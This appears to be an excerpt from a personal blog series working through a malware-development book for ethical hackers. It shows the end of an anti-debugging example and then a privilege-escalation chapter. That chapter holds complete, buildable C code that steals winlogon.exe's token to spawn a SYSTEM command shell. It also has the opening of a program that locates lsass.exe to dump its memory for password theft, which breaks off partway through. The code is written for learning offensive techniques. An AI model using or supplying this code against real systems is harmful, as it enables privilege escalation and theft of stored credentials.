class="n">DWORD</span><span class="w"> </span><span class="n">returned</span><span class="p">;</span> <span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">ProcessDebugFlags</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mh">0x1f</span><span class="p">;</span><span class="w"> </span><span class="c1">// not documented in below link</span> <span class="w"> </span><span class="n">HMODULE</span><span class="w"> </span><span class="n">nt</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">LoadLibraryA</span><span class="p">(</span><span class="s">"ntdll.dll"</span><span class="p">);</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess</span> <span class="w"> </span><span class="n">fNtQueryInformationProcess</span><span class="w"> </span><span class="n">myNtQueryInformationProcess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">fNtQueryInformationProcess</span><span class="p">)</span> <span class="w"> </span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">nt</span><span class="p">,</span><span class="w"> </span><span class="s">"NtQueryInformationProcess"</span><span class="p">);</span> <span class="w"> </span><span class="n">myNtQueryInformationProcess</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span><span class="w"> </span><span class="n">ProcessDebugFlags</span><span class="p">,</span> <span class="w"> </span><span class="o">&amp;</span><span class="n">rProcDebugFlags</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">DWORD</span><span class="p">),</span><span class="w"> </span><span class="o">&amp;</span><span class="n">returned</span><span class="p">);</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="mi">0</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">rProcDebugFlags</span><span class="p">){</span> <span class="w"> </span><span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="s">"Debugger Detected"</span><span class="p">,</span><span class="w"> </span><span class="s">"Program"</span><span class="p">,</span><span class="w"> </span><span class="n">MB_OK</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"> </span><span class="c1">// exit if a debugger is present</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">result</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// Function that simulates the main functionality</span> <span class="kt">void</span><span class="w"> </span><span class="nf">hack</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">MessageBox</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="s">"Malicious Code"</span><span class="p">,</span><span class="w"> </span><span class="s">"Program"</span><span class="p">,</span><span class="w"> </span><span class="n">MB_OK</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">()</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="c1">// Check if a debugger is present</span> <span class="w"> </span><span class="n">DebuggerCheck</span><span class="p">();</span> <span class="w"> </span><span class="c1">// Main functionality</span> <span class="w"> </span><span class="n">hack</span><span class="p">();</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <p>I modified the code a bit to be more inline with the other example from Checkpoint. It presents like the prior example, as follows: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2025/01/image-62.webp"/></p> <h1 id="summary_1">Summary</h1> <p>A very interesting chapter into several anti-debugging techniques. I had to do some searching on external resources as some of the book content did not feel very well explained to me. However, it still included some very interesting techniques. From the profile information in ScyllaHide in my x64dbg, it appears all of these techniques can easily be masked in order to allow the application to continue without needing to manually step through the code and disable any debugger checks.</p>2025-01-25T19:25:23-05:002025-01-25T19:25:23-05:00Eric Turnertag:blog.ericturner.it,2025-01-25:/2025/01/25/malware-dev-chapter-04-privilege-escalation/

<p>Continued series from the&nbsp;<a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers Book</a>.<br/> GitHub repo:&nbsp;<a href="https://github.com/EricTurner3/cybersecurity/tree/main/Malware_Development">EricTurner3 &ndash; Malware_Development</a>.</p> <p>This chapter contains methods to achieve persistence of malware in Windows.</p> <h1 id="manipulating-access-tokens">Manipulating Access Tokens</h1> <h2 id="token-theft">Token Theft</h2> <p>The book provides a great demonstration of C code where the end user can pass a PID and it attempts …</p>

<p>Continued series from the&nbsp;<a href="https://www.packtpub.com/en-us/product/malware-development-for-ethical-hackers-9781801810173">Malware Development for Ethical Hackers Book</a>.<br/> GitHub repo:&nbsp;<a href="https://github.com/EricTurner3/cybersecurity/tree/main/Malware_Development">EricTurner3 &ndash; Malware_Development</a>.</p> <p>This chapter contains methods to achieve persistence of malware in Windows.</p> <h1 id="manipulating-access-tokens">Manipulating Access Tokens</h1> <h2 id="token-theft">Token Theft</h2> <p>The book provides a great demonstration of C code where the end user can pass a PID and it attempts to grab the token for that process and then opens up mspaint.exe with those privileges. I made a few adjustments. My code takes a snapshot of all running processes, searches for a specific process (in this case winlogon.exe, which should always be running as <code>NT AUTHORITY\SYSTEM</code>, automatically grabs the PID and then spawns a command shell with elevated permissions. In this instance, the local admin account needs to run the executable, which then is able to escalate further to <code>SYSTEM</code>. I attempted to run from a non-elevated account, and it fails to properly grab the privilege.</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> PrivEsc - Token Theft</span> <span class="cm"> 23 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-gcc 04_token_theft.c -o RunAsAdmin.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;tlhelp32.h&gt;</span> <span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">processToSteal</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"winlogon.exe"</span><span class="p">;</span><span class="w"> </span><span class="c1">// process to find to attempt to take </span> <span class="n">LPWSTR</span><span class="w"> </span><span class="n">processToCreate</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sa">L</span><span class="s">"C:</span><span class="se">\\</span><span class="s">Windows</span><span class="se">\\</span><span class="s">System32</span><span class="se">\\</span><span class="s">cmd.exe"</span><span class="p">;</span><span class="w"> </span><span class="c1">// new process to create with the stolen token</span> <span class="c1">// my custom code, find a specific process</span> <span class="n">DWORD</span><span class="w"> </span><span class="nf">findProcess</span><span class="p">(</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">procName</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcessSnap</span><span class="p">;</span> <span class="w"> </span><span class="n">PROCESSENTRY32</span><span class="w"> </span><span class="n">pe32</span><span class="p">;</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">winlogonPID</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="w"> </span><span class="c1">// Take a snapshot of all processes in the system.</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-createtoolhelp32snapshot</span> <span class="w"> </span><span class="n">hProcessSnap</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CreateToolhelp32Snapshot</span><span class="p">(</span><span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">hProcessSnap</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">INVALID_HANDLE_VALUE</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="n">pe32</span><span class="p">.</span><span class="n">dwSize</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESSENTRY32</span><span class="p">);</span> <span class="w"> </span><span class="c1">// Retrieve information about the first process.</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">Process32First</span><span class="p">(</span><span class="n">hProcessSnap</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">pe32</span><span class="p">))</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">do</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="c1">// Check if the process name matches (0 indicates identical)</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">_stricmp</span><span class="p">(</span><span class="n">pe32</span><span class="p">.</span><span class="n">szExeFile</span><span class="p">,</span><span class="w"> </span><span class="n">procName</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">winlogonPID</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pe32</span><span class="p">.</span><span class="n">th32ProcessID</span><span class="p">;</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"> </span><span class="c1">// Exit the loop once we find the process</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="n">Process32Next</span><span class="p">(</span><span class="n">hProcessSnap</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">pe32</span><span class="p">));</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="c1">// Clean up the snapshot object.</span> <span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">hProcessSnap</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">winlogonPID</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// set privilege</span> <span class="n">BOOL</span><span class="w"> </span><span class="nf">setPrivilege</span><span class="p">(</span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">priv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">token</span><span class="p">;</span> <span class="w"> </span><span class="n">TOKEN_PRIVILEGES</span><span class="w"> </span><span class="n">tp</span><span class="p">;</span> <span class="w"> </span><span class="n">LUID</span><span class="w"> </span><span class="n">luid</span><span class="p">;</span> <span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">res</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">TRUE</span><span class="p">;</span> <span class="w"> </span><span class="c1">// takes the name of the privilege from arg and attempts to find it in system</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-lookupprivilegevaluew </span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">LookupPrivilegeValue</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">priv</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">luid</span><span class="p">))</span><span class="w"> </span><span class="n">res</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span> <span class="w"> </span><span class="c1">// attempt to open the proc token with the ability to adjust privs</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocesstoken</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">OpenProcessToken</span><span class="p">(</span><span class="n">GetCurrentProcess</span><span class="p">(),</span><span class="w"> </span><span class="n">TOKEN_ADJUST_PRIVILEGES</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">token</span><span class="p">))</span><span class="w"> </span><span class="n">res</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span> <span class="w"> </span><span class="c1">// create a new token priv object and enable the privilege</span> <span class="w"> </span><span class="n">tp</span><span class="p">.</span><span class="n">PrivilegeCount</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span> <span class="w"> </span><span class="n">tp</span><span class="p">.</span><span class="n">Privileges</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Luid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">luid</span><span class="p">;</span> <span class="w"> </span><span class="n">tp</span><span class="p">.</span><span class="n">Privileges</span><span class="p">[</span><span class="mi">0</span><span class="p">].</span><span class="n">Attributes</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">SE_PRIVILEGE_ENABLED</span><span class="p">;</span> <span class="w"> </span><span class="c1">// use the token priv object to enable the privilege</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokenprivileges</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">AdjustTokenPrivileges</span><span class="p">(</span><span class="n">token</span><span class="p">,</span><span class="w"> </span><span class="n">FALSE</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">tp</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">TOKEN_PRIVILEGES</span><span class="p">),</span><span class="w"> </span><span class="p">(</span><span class="n">PTOKEN_PRIVILEGES</span><span class="p">)</span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">PDWORD</span><span class="p">)</span><span class="nb">NULL</span><span class="p">))</span><span class="w"> </span><span class="n">res</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span> <span class="w"> </span><span class="c1">// cleanup</span> <span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">token</span><span class="p">);</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="n">res</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"privilege enabled %s</span><span class="se">\n</span><span class="s">"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"failed to enable privilege %s </span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">priv</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">res</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// get access token</span> <span class="n">HANDLE</span><span class="w"> </span><span class="nf">getToken</span><span class="p">(</span><span class="n">DWORD</span><span class="w"> </span><span class="n">pid</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">cToken</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">ph</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pid</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">ph</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">GetCurrentProcess</span><span class="p">();</span> <span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">ph</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">OpenProcess</span><span class="p">(</span><span class="n">PROCESS_QUERY_LIMITED_INFORMATION</span><span class="p">,</span><span class="w"> </span><span class="n">TRUE</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">);</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">ph</span><span class="p">)</span><span class="w"> </span><span class="n">cToken</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">HANDLE</span><span class="p">)</span><span class="nb">NULL</span><span class="p">;</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="n">ph</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"successfully get process handle :)</span><span class="se">\n</span><span class="s">"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"failed to get process handle :(</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">res</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">OpenProcessToken</span><span class="p">(</span><span class="n">ph</span><span class="p">,</span><span class="w"> </span><span class="n">MAXIMUM_ALLOWED</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">cToken</span><span class="p">);</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">res</span><span class="p">)</span><span class="w"> </span><span class="n">cToken</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">HANDLE</span><span class="p">)</span><span class="nb">NULL</span><span class="p">;</span> <span class="w"> </span><span class="n">printf</span><span class="p">((</span><span class="n">cToken</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="p">(</span><span class="n">HANDLE</span><span class="p">)</span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"successfully get access token :)</span><span class="se">\n</span><span class="s">"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"failed to get access token :(</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">cToken</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// create process</span> <span class="n">BOOL</span><span class="w"> </span><span class="nf">createProcess</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">token</span><span class="p">,</span><span class="w"> </span><span class="n">LPCWSTR</span><span class="w"> </span><span class="n">app</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">dToken</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span> <span class="w"> </span><span class="n">STARTUPINFOW</span><span class="w"> </span><span class="n">si</span><span class="p">;</span> <span class="w"> </span><span class="n">PROCESS_INFORMATION</span><span class="w"> </span><span class="n">pi</span><span class="p">;</span> <span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">res</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">TRUE</span><span class="p">;</span> <span class="w"> </span><span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">si</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">STARTUPINFOW</span><span class="p">));</span> <span class="w"> </span><span class="n">ZeroMemory</span><span class="p">(</span><span class="o">&amp;</span><span class="n">pi</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESS_INFORMATION</span><span class="p">));</span> <span class="w"> </span><span class="n">si</span><span class="p">.</span><span class="n">cb</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">STARTUPINFOW</span><span class="p">);</span> <span class="w"> </span><span class="c1">// copy the arg access token and make a new access token with max allowed perms</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-duplicatetokenex</span> <span class="w"> </span><span class="n">res</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">DuplicateTokenEx</span><span class="p">(</span><span class="n">token</span><span class="p">,</span><span class="w"> </span><span class="n">MAXIMUM_ALLOWED</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">SecurityImpersonation</span><span class="p">,</span><span class="w"> </span><span class="n">TokenPrimary</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">dToken</span><span class="p">);</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="n">res</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"process token duplicated</span><span class="se">\n</span><span class="s">"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"failed to duplicate process token</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="c1">// attempt to create the new process with token</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createprocesswithtokenw</span> <span class="w"> </span><span class="n">res</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CreateProcessWithTokenW</span><span class="p">(</span><span class="n">dToken</span><span class="p">,</span><span class="w"> </span><span class="n">LOGON_WITH_PROFILE</span><span class="p">,</span><span class="w"> </span><span class="n">app</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">si</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">pi</span><span class="p">);</span> <span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="n">res</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"process created</span><span class="se">\n</span><span class="s">"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">"failed to create process</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">res</span><span class="p">;</span> <span class="p">}</span> <span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="o">**</span><span class="w"> </span><span class="n">argv</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">setPrivilege</span><span class="p">(</span><span class="n">SE_DEBUG_NAME</span><span class="p">))</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">-1</span><span class="p">;</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">pid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">findProcess</span><span class="p">(</span><span class="n">processToSteal</span><span class="p">);</span><span class="w"> </span><span class="c1">// take snapshot and find a specific process</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">cToken</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getToken</span><span class="p">(</span><span class="n">pid</span><span class="p">);</span><span class="w"> </span><span class="c1">// attempt to get token</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">createProcess</span><span class="p">(</span><span class="n">cToken</span><span class="p">,</span><span class="w"> </span><span class="n">processToCreate</span><span class="p">))</span><span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">-1</span><span class="p">;</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div> <h1 id="password-stealing_1">Password Stealing</h1> <p>It appears I was a bit ahead of the curve in the last section, as this topic now introduces scanning for a process. We can re-use a lot of our existing code from the token theft, including the findProcess and setPriv functions. Initiallly, I was not getting the dump file generated. I determined the path must exist, otherwise <code>CreateFileW</code> cannot create a new dir, only the file. I added some extra printf statements for debugging in <code>generateMiniDump()</code>.</p> <div class="highlight"><pre><span></span><code><span class="cm">/*</span> <span class="cm"> PrivEsc - LSASS Dump</span> <span class="cm"> 23 Jan 2025</span> <span class="cm"> Eric</span> <span class="cm"> To build: x86_64-w64-mingw32-gcc 04_dump_lsass.c -o dump.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -ldbghelp</span> <span class="cm">*/</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;windows.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdio.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;stdlib.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;string.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;tlhelp32.h&gt;</span> <span class="cp">#include</span><span class="w"> </span><span class="cpf">&lt;dbghelp.h&gt;</span> <span class="cp">#pragma comment (lib, "dbghelp.lib")</span> <span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">targetProcess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="s">"lsass.exe"</span><span class="p">;</span><span class="w"> </span><span class="c1">// process to find</span> <span class="n">LPCWSTR</span><span class="w"> </span><span class="n">dumpFile</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="sa">L</span><span class="s">"C:</span><span class="se">\\</span><span class="s">Users</span><span class="se">\\</span><span class="s">Public</span><span class="se">\\</span><span class="s">Desktop</span><span class="se">\\</span><span class="s">lsass.dmp"</span><span class="p">;</span><span class="w"> </span><span class="c1">// where the proc dump should go, the dir should already exist, else CreateFile will fail</span> <span class="c1">// my custom code, find a specific process</span> <span class="n">DWORD</span><span class="w"> </span><span class="nf">findProcess</span><span class="p">(</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">procName</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcessSnap</span><span class="p">;</span> <span class="w"> </span><span class="n">PROCESSENTRY32</span><span class="w"> </span><span class="n">pe32</span><span class="p">;</span> <span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">winlogonPID</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="w"> </span><span class="c1">// Take a snapshot of all processes in the system.</span> <span class="w"> </span><span class="c1">// https://learn.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-createtoolhelp32snapshot</span> <span class="w"> </span><span class="n">hProcessSnap</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">CreateToolhelp32Snapshot</span><span class="p">(</span><span class="n">TH32CS_SNAPPROCESS</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">hProcessSnap</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">INVALID_HANDLE_VALUE</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="n">pe32</span><span class="p">.</span><span class="n">dwSize</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">PROCESSENTRY32</span><span class="p">);</span> <span class="w"> </span><span class="c1">// Retrieve information about the first process.</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">Process32First</span><span class="p">(</span><span class="n">hProcessSnap</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">pe32</span><span class="p">))</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="k">do</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="c1">// Check if the process name matches (0 indicates identical)</span> <span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">_stricmp</span><span class="p">(</span><span class="n">pe32</span><span class="p">.</span><span class="n">szExeFile</span><span class="p">,</span><span class="w"> </span><span class="n">procName</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span> <span class="w"> </span><span class="n">winlogonPID</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">pe32</span><span class="p">.</span><span class="n">th32ProcessID</span><span class="p">;</span> <span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"> </span><span class="c1">// Exit the loop once we find the process</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="n">Process32Next</span><span class="p">(</span><span class="n">hProcessSnap</span><span class="p">,</span><span class="w"> </span><span class="o">&amp;</span><span class="n">pe32</span><span class="p">));</span> <span class="w"> </span><span class="p">}</span> <span class="w"> </span><span class="c1">// Clean up the snapshot object.</span> <span class="w"> </span><span class="n">CloseHandle</span><span class="p">(</span><span class="n">hProcessSnap</span><span class="p">);</span> <span class="w"> 